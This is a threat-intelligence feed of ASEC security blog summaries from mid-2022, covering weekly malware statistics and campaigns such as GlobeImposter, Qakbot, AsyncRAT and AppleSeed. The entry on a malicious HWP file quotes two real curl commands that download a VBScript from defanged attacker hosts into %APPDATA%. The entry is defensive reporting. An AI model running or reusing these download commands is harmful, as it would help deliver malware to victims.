| Src |
Date (GMT) |
Titre |
Description |
Tags |
Stories |
Notes |
 |
2022-10-12 04:24:38 |
GlobeImposter Ransomware Being Distributed in Korea (lien direct) |
The ASEC analysis team has recently identified through internal monitoring that the GlobeImposter ransomware, which targets vulnerable MS-SQL servers, is being distributed. This GlobeImposter ransomware has also been mentioned in AhnLab TIP’s quarterly statistics, specifically in the ‘2022 1st and 2nd Quarter Statistical Report on Malware Targeting MS-SQL,’ and in the 2nd quarter, GlobeImposter took up 52.6% of ransomware targeting MS-SQL. It has been identified that the GlobeImposter ransomware is still appearing in the soon-to-be-released 3rd quarter statistics. This ransomware...
|
Ransomware
Malware
|
|
|
|
2022-10-12 04:18:45 |
(Déjà vu) ASEC Weekly Malware Statistics (September 26th, 2022 – October 2nd, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 26th, 2022 (Monday) to October 2nd, 2022 (Sunday). For the main category, downloader ranked top with 38.2%, followed by info-stealer with 35.1%, ransomware with 14.7%, backdoor with 11.6%, and CoinMiner with 0.4%. Top 1 – BeamWinHTTP BeamWinHTTP is a downloader malware that ranked top with 16.7%. BeamWinHTTP is distributed via malware disguised...
|
Ransomware
Malware
|
|
|
|
2022-10-12 04:01:25 |
Qakbot Being Distributed as ISO Files Instead of Excel Macro (lien direct) |
There is a recent increase in the distribution method of malware through ISO files. Among the malware, it has been identified that Qakbot, an online banking malware, has had its distribution method changed from Excel 4.0 Macro to ISO files. The ASEC blog introduced cases of ISO file usage for not only Qakbot, but also AsyncRAT, IcedID, and BumbleBee malware. As such, we can see that cases of using ISO files for malware distribution are increasing. The phishing mail that...
|
Malware
|
|
|
|
2022-09-28 04:06:47 |
(Déjà vu) ASEC Weekly Malware Statistics (September 19th, 2022 – September 25th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 19th, 2022 (Monday) to September 25th, 2022 (Sunday). For the main category, info-stealer ranked top with 51.3%, followed by backdoor with 21.1%, downloader with 17.2%, and ransomware with 10.3%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 20.7%. It is an info-stealer that leaks user credentials saved...
|
Ransomware
Malware
|
|
|
|
2022-09-28 03:39:14 |
(Déjà vu) ASEC Weekly Malware Statistics (September 12th, 2022 – September 18th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 12th, 2022 (Monday) to September 18th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.5%, followed by downloader with 27.5%, backdoor with 19.9%, ransomware with 8.2%, and banking malware with 2.9%. Top 1 – AgentTesla AgentTesla is an infostealer that ranked first place with 18.1%. It is an info-stealer that...
|
Ransomware
Malware
|
|
|
|
2022-09-23 00:14:52 |
FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers (lien direct) |
The ASEC analysis team is constantly monitoring malware distributed to vulnerable MS-SQL servers. The analysis team has recently discovered the distribution of FARGO ransomware that is targeting vulnerable MS-SQL servers. Along with GlobeImposter, FARGO is one of the prominent ransomware that targets vulnerable MS-SQL servers. In the past, it was also called the Mallox because it used the file extension .mallox. – [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers– [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers...
|
Ransomware
Malware
|
|
|
|
2022-09-21 00:28:20 |
(Déjà vu) ASEC Weekly Malware Statistics (September 5th, 2022 – September 11th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 5th, 2022 (Monday) to September 11th, 2022 (Sunday). For the main category, info-stealer ranked top with 47.1%, followed by downloader with 32.7%, backdoor with 12.5%, and ransomware with 7.7%. Top 1 – GuLoader GuLoader, which ranked first place with 21.1%, is a downloader malware that downloads additional malware and runs it. It...
|
Ransomware
Malware
|
|
|
|
2022-09-14 00:40:00 |
Phishing Websites Disguised as Korean Groupware Login Website Being Distributed (lien direct) |
The ASEC analysis team has been building a honeypot to collect various malware strains that are being distributed both in Korea and overseas. The honeypot also collects phishing emails and recently caught one targeting Korean users, which was being distributed continuously to Korean email accounts only since August. The phishing website the email is redirected to is disguised as a login page for a Korean groupware site, and over 2,500 cases were confirmed to access the website. Thus users must...
|
Malware
|
|
|
|
2022-09-14 00:30:00 |
(Déjà vu) ASEC Weekly Malware Statistics (August 29th, 2022 – September 4th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 29th, 2022 (Monday) to September 4th, 2022 (Sunday). For the main category, info-stealer ranked top with 45.9%, followed by downloader with 28.1%, backdoor with 18.5%, ransomware with 6.2%, and CoinMiner and banking malware with 0.7% each. Top 1 – GuLoader GuLoader, which ranked first place with 22.6%, is a downloader malware that...
|
Ransomware
Malware
|
|
|
|
2022-09-01 09:49:18 |
(Déjà vu) ASEC Weekly Malware Statistics (August 22nd, 2022 – August 28th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 22nd, 2022 (Monday) to August 28th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.0%, followed by backdoor with 31.8%, downloader with 21.4%, and ransomware with 5.8%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.7%. It is an info-stealer that leaks user credentials...
|
Ransomware
Malware
|
|
|
|
2022-09-01 09:47:35 |
(Déjà vu) ASEC Weekly Malware Statistics (August 15th, 2022 – August 21st, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 15th, 2022 (Monday) to August 21st, 2022 (Sunday). For the main category, info-stealer ranked top with 57.8%, followed by backdoor with 24.2%, downloader with 13.7%, ransomware with 3.7%, and CoinMiner with 0.6%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 38.5%. It is an info-stealer that leaks...
|
Ransomware
Malware
|
|
|
|
2022-09-01 01:51:53 |
Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) (lien direct) |
The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp Both commands save scripts in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript codes that perform features such as registering to task...
|
Malware
|
|
|
|
2022-08-31 23:26:41 |
RAT Tool Disguised as Solution File (*.sln) Being Distributed on Github (lien direct) |
The ASEC analysis team has recently discovered the distribution of a RAT Tool disguised as a solution file (*.sln) on GitHub. As shown in Figure 1, the malware distributor is sharing a source code on GitHub titled “Jpg Png Exploit Downloader Fud Cryter Malware Builder Cve 2022”. The file composition looks normal, but the solution file (*.sln) is actually a RAT tool. It is through methods like this that the malware distributor lures users to run the RAT tool by...
|
Malware
Tool
|
|
|
|
2022-08-24 05:02:44 |
AsyncRAT Being Distributed in Fileless Form (lien direct) |
The ASEC analysis team has recently discovered that malicious AsyncRAT codes are being distributed in fileless form. The distributed AsyncRAT is executed in fileless form through multiple script files and is thought to be distributed as a compressed file attachment in emails. AsyncRAT is an open-source RAT malware developed with .NET that can execute various malicious activities under the command of the attacker. The compressed file being distributed through phishing emails has an html file and executing this file will...
|
Malware
|
|
|
|
2022-08-18 00:26:46 |
(Déjà vu) ASEC Weekly Malware Statistics (August 8th, 2022 – August 14th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 8th, 2022 (Monday) to August 14th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.9%, followed by backdoor with 38.4%, downloader with 16.8%, ransomware with 2.2%, and CoinMiner with 0.6%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.1%. It is an info-stealer that leaks...
|
Ransomware
Malware
|
|
|
|
2022-08-17 01:43:10 |
(Déjà vu) ASEC Weekly Malware Statistics (August 1st, 2022 – August 7th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 1st, 2022 (Monday) to August 7th, 2022 (Sunday). For the main category, info-stealer ranked top with 47.4%, followed by backdoor with 22.6%, downloader with 20.0%, ransomware with 6.8%, banking with 2.6%, and CoinMiner with 0.5%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 25.8%. It is...
|
Ransomware
Malware
|
|
|
|
2022-08-08 02:21:33 |
Monero CoinMiner Being Distributed via Webhards (lien direct) |
Webhards are the main platforms that the attackers targeting Korean users exploit to distribute malware. The ASEC analysis team has been monitoring malware types distributed through webhards and uploaded multiple blog posts about them in the past. Generally, attackers distribute malware with illegal programs such as adult games and crack versions of games. Those who use webhards as a distribution path typically install RAT type malware such as njRAT, UdpRAT, and DDoS IRC Bot. The team has recently discovered the...
|
Malware
|
|
|
|
2022-08-03 02:20:00 |
(Déjà vu) ASEC Weekly Malware Statistics (July 25th, 2022 – July 31st, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from July 25th, 2022 (Monday) to July 31st, 2022 (Sunday). For the main category, info-stealer ranked top with 38.6%, followed by backdoor with 38.1%, and downloader with 23.3%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.8%. It is an info-stealer that leaks user credentials saved in web...
|
Malware
|
|
|
|
2022-07-28 05:48:00 |
(Déjà vu) ASEC Weekly Malware Statistics (July 18th, 2022 – July 24th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from July 18th, 2022 (Monday) to July 24th, 2022 (Sunday). For the main category, info-stealer ranked top with 44.7%, followed by backdoor with 40.3%, downloader with 14.5%, and ransomware with 0.6%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 27.0%. It is an info-stealer that leaks user credentials...
|
Ransomware
Malware
|
|
|
|
2022-07-28 05:27:47 |
AppleSeed Being Distributed to Maintenance Company of Military Bases (lien direct) |
The ASEC analysis team has recently discovered a case of AppleSeed being distributed to a certain maintenance company of military bases. AppleSeed is a backdoor malware mainly used by the Kimsuky group and is actively being distributed to multiple attack targets as of late. In this case, the malware was distributed with a file under the name of a military base. 20220713_**** base_installation planned dateV004_*** edited_6.xls AppleSeed was distributed as an Excel file (XLS) and protected with a password to...
|
Malware
|
|
|
|
2022-07-25 05:26:50 |
IcedID Being Distributed Through ISO Files (lien direct) |
The ASEC analysis team has been introducing various types of malware that were distributed through ISO files. And the team recently discovered the distribution of IcedID (module-type banking malware) through ISO files. There were two methods to distribute the malware. The first one used the same method employed by the Bumblebee malware that was discussed in the previous post. The second method is similar to the first one but had script files and the cmd command added. The first type...
|
Malware
|
|
|
|
2022-07-25 05:17:47 |
(Déjà vu) ASEC Weekly Malware Statistics (July 11th, 2022 – July 17th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from July 11th, 2022 (Monday) to July 17th, 2022 (Sunday). For the main category, info-stealer ranked top with 52.2%, followed by backdoor with 26.8%, downloader with 19.7%, banking with 0.6%, and ransomware with 0.6%. Top 1 – AgentTesla AgentTesla is an infostealer that ranked first place with 29.9%. It is an info-stealer that leaks...
|
Ransomware
Malware
|
|
|
|
2022-07-21 00:17:28 |
(Déjà vu) ASEC Weekly Malware Statistics (July 4th, 2022 – July 10th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from July 4th, 2022 (Monday) to July 10th, 2022 (Sunday). For the main category, info-stealer ranked top with 43.9%, followed by downloader with 27.2%, backdoor with 21.1%, banking with 6.1%, ransomware with 1.1%, and coinminer with 0.6%. Top 1 – AgentTesla AgentTesla is an infostealer that ranked first place with 27.2%. It is an...
|
Ransomware
Malware
|
|
|
|
2022-07-21 00:10:40 |
Malware Being Distributed by Disguising Itself as Icon of V3 Lite (lien direct) |
The ASEC analysis team has discovered the distribution of malware disguised as a V3 Lite icon and packed with the .NET packer. The attacker likely created an icon that is almost identical to that of V3 Lite to trick the user, and AveMaria RAT and AgentTesla were discovered during the last month using this method. As shown in Figure 1, the icon looks almost identical to the actual V3 Lite icon. AveMaria is a RAT (Remote Administration Tool) malware with...
|
Malware
|
|
|
|
2022-07-21 00:06:36 |
Amadey Bot Being Distributed Through SmokeLoader (lien direct) |
Amadey Bot, a malware that was first discovered in 2018, is capable of stealing information and installing additional malware by receiving commands from the attacker. Like other malware strains, it has been sold in illegal forums and used by various attackers. The ASEC analysis team previously revealed cases where Amadey was used on attacks in the ASEC blog posted in 2019 (English version unavailable). Amadey was mainly used to install ransomware by attackers of GandCrab or to install FlawedAmmyy by...
|
Ransomware
Malware
|
|
|
|
2022-07-11 23:47:10 |
GuLoader Disguised as Estimate Requests Being Distributed via Phishing Email (lien direct) |
GuLoader has ranked again in Top 5 malware keywords of ASEC Weekly Malware Statistics for the first time in two years. It is a downloader malware that can download additional malware, and got its name as Google Drive is frequently used as its download URL. The ASEC analysis team has discovered that this type of malware took the most portion among Downloader malware types that were distributed during the 2nd quarter of this year (see figure below). Recently discovered case...
|
Malware
|
|
|
|
2022-07-11 00:47:31 |
Meterpreter Distributed to Vulnerable Server of Korean Medical Institution (lien direct) |
While monitoring malware strains distributed to vulnerable servers, the ASEC analysis team discovered an attack case for PACS (Picture Archiving and Communication System) server used by Korean medical institutions. PACS is a system for digitally managing and transferring medical images of patients, which is used to check and interpret the images without being restrained by time and space. This system is thus used by many hospitals. As there are multiple PACS vendors, each medical institution may use different PACS systems....
|
Malware
|
|
|
|
2022-07-11 00:36:11 |
AppleSeed Disguised as Purchase Order and Request Form Being Distributed (lien direct) |
The ASEC analysis team has recently discovered the distribution of AppleSeed disguised as purchase orders and request forms. AppleSeed is a backdoor malware mainly used by the Kimsuky group. It stays in the system and performs malicious behaviors by receiving commands from attackers. The malware is currently being distributed under the following filenames. Purchase order-**-2022****-001-National Tax Service additionally implementing security sensors in 5 regional tax offices_***.jse Request form(general manager ***).jse The JSE (JScript Encoded File) file consists of JavaScript, and...
|
Malware
|
|
|
|
2022-07-07 01:27:25 |
(Déjà vu) ASEC Weekly Malware Statistics (June 27th, 2022 – July 3rd, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from June 27th, 2022 (Monday) to July 3rd, 2022 (Sunday). For the main category, info-stealer ranked top with 48.0%, followed by banking malware with 26.5%, RAT (Remote Administration Tool) with 12.5%, downloader with 8.2%, ransomware with 2.2%, coinminer with 1.8%, and backdoor with 0.7%. Top 1 – AgentTesla AgentTesla is an infostealer that ranked...
|
Ransomware
Malware
|
|
|
|
2022-07-07 01:13:00 |
AsyncRAT Being Distributed to Vulnerable MySQL Servers (lien direct) |
The ShadowServer foundation has recently released a report showing that there are about 3.6 million MySQL servers exposed to outside. Along with MS-SQL server, MySQL server is one of the main database servers that provides the feature of managing large amounts of data in a corporate or user environment. MS-SQL is mainly used in Windows environments, but MySQL is still being used by many in Linux environments. ASEC analysis team is constantly monitoring malware distributed to vulnerable database servers. In...
|
Malware
|
|
|
|
2022-07-01 05:27:57 |
Case of Attack Exploiting AnyDesk Remote Tool (Cobalt Strike and Meterpreter) (lien direct) |
MS-SQL servers are mainly the attack targets for Windows systems. Attackers scan vulnerable MS-SQL servers that are poorly managed and install malware upon gaining control. Malware strains installed by attackers include CoinMiner, ransomware, backdoor, etc., and may vary depending on the purpose of the attack. Most backdoor strains are remote control types such as Remcos RAT and Gh0st RAT, but there are also infiltration testing tools used to dominate companies’ internal systems such as Cobalt Strike and Meterpreter. The attack...
|
Malware
Tool
|
|
|
|
2022-06-29 05:06:20 |
(Déjà vu) ASEC Weekly Malware Statistics (June 20th, 2022 – June 26th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from June 20th, 2022 (Monday) to June 26th, 2022 (Sunday). For the main category, info-stealer ranked top with 53.8%, followed by downloader with 25.1%, backdoor with 14.8%, banking malware with 4.9%, and ransomware with 1.3%. Top 1 – AgentTesla AgentTesla is an infostealer that ranked first place with 25.6%. It is an info-stealer that...
|
Ransomware
Malware
|
|
|
|
2022-06-28 04:44:03 |
ASEC Weekly Malware Statistics (June 13th, 2022 – June 19th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from June 13th, 2022 (Monday) to June 19th, 2022 (Sunday). For the main category, info-stealer ranked top with 63.8%, followed by backdoor with 17.8%, downloader with 8.9%, banking malware with 7.5%, and ransomware with 1.9%. Top 1 – AgentTesla AgentTesla is an infostealer that ranked first place with 29.1%. It is an info-stealer that...
|
Ransomware
Malware
|
|
|
|
2022-06-28 04:42:22 |
New Info-stealer Disguised as Crack Being Distributed (lien direct) |
The ASEC analysis team has previously uploaded posts about various malware types that are being distributed by disguising themselves as software cracks and installers. CryptBot, RedLine, and Vidar are major example cases. Recently, a single malware type of RedLine has disappeared (it is still being distributed as a dropper type) and a new infostealer malware is being actively distributed instead. Its distribution became in full swing starting from May 20th, globally categorized as “Recordbreaker Stealer.” Some analyses see it as...
|
Malware
|
|
|
